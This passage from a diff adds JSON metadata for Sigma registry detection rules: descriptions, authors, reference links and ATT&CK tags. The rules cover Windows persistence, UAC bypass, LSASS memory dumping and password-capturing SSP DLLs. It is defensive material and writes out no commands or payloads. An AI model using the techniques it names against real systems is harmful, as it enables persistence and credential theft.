"registry_event_office_test_regadd.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1137/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.002" + ] + }, + "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "value": "Office Application Startup - Office Test" + }, + { + "description": "Detects persistence registry keys for Recycle Bin", + "meta": { + "author": "frack113", + "creation_date": "2021/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_persistence_recycle_bin.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", + "https://persistence-info.github.io/Data/recyclebin.html", + "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", + "value": "Registry Persistence Mechanisms in Recycle Bin" + }, + { + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/06/22", + "falsepositive": [ + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" + ], + "filename": "registry_event_portproxy_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.dfirnotes.net/portproxy_detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "value": "PortProxy Registry Key" + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "meta": { + "author": "Alexander Rausch", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_redmimicry_winnti_reg.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "value": "RedMimicry Winnti Playbook Registry Manipulation" + }, + { + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_runkey_winekey.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "value": "WINEKEY Registry Modification" + }, + { + "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/11/15", + "falsepositive": [ + "Legitimate modification of the registry key by legitimate program" + ], + "filename": "registry_event_runonce_persistence.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", + "value": "Run Once Task Configuration in Registry" + }, + { + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_shell_open_keys_manipulation.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", + "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" + ] + }, + "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "value": "Shell Open Registry Keys Manipulation" + }, + { + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_event_silentprocessexit_lsass.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.007" + ] + }, + "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", + "value": "SilentProcessExit Monitor Registration for LSASS" + }, + { + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "meta": { + "author": "iwillkeepwatch", + "creation_date": "2019/01/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_event_ssp_added_lsa_config.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.005" + ] + }, + "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "value": "Security Support Provider (SSP) Added to LSA Configuration" + }, + { + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "meta": { + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/03/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_event_stickykey_like_backdoor.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" + ] + }, + "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "value": "Sticky Key Like Backdoor Usage - Registry" + }, + { + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", + "meta": { + "author": "Mateusz Wydra, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Creation of non-default, legitimate at usage" + ], + "filename": "registry_event_susp_atbroker_change.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "value": "Atbroker Registry Change" + }, + { + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/01", + "falsepositive": [ + "Software installers downloaded and used by users" + ], + "filename": "registry_event_susp_download_run_key.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "value": "Suspicious Run Key from Download" + }, + { + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_susp_lsass_dll_load.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://twitter.com/SBousseaden/status/1183745981189427200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1547.008" + ] + }, + "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "value": "DLL Load via LSASS" + }, + { + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "meta": { + "author": "Den Iuzvyk", + "creation_date": "2020/06/07", + "falsepositive": [ + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + ], + "filename": "registry_event_susp_mic_cam_access.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" + ], + "tags": [ + "attack.collection", + "attack.t1125", + "attack.t1123" + ] + }, + "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", + "value": "Suspicious Camera and Microphone Access" + }, + { + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "registry_event_trust_record_modification.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", + "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "value": "Windows Registry Trust Record Modification" + }, + { + "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_abusing_windows_telemetry_for_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_abusing_windows_telemetry_for_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112", + "attack.t1053" + ] + }, + "uuid": "4e8d5fd3-c959-441f-a941-f73d0cdcdca5", + "value": "Abusing Windows Telemetry For Persistence - Registry" + }, + { + "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_add_hidden_user.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_hidden_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ] + }, + "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a", + "value": "User Account Hidden By Registry" + }, + { + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_add_load_service_in_safe_mode.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "value": "Registry Persitence via Service in Safe Mode" + }, + { + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_add_port_monitor.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", + "value": "Add Port Monitor Persistence in Registry" + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + ], + "filename": "registry_set_aedebug_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/aedebug.html", + "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "092af964-4233-4373-b4ba-d86ea2890288", + "value": "Add Debugger Entry To AeDebug For Persistence" + }, + { + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitmate use of the feature (alerts should be investigated either way)" + ], + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", + "value": "Allow RDP Remote Assistance Feature" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_classes.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "9df5f547-c86a-433e-b533-f2794357e242", + "value": "Classes Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_common.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://persistence-info.github.io/Data/userinitmprlogonscript.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "value": "Common Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "value": "CurrentControlSet Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "value": "CurrentVersion Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "value": "CurrentVersion NT Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "value": "Internet Explorer Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_office.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", + "value": "Office Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" + ] + }, + "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "value": "Session Manager Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "value": "System Scripts Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "value": "WinSock2 Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + 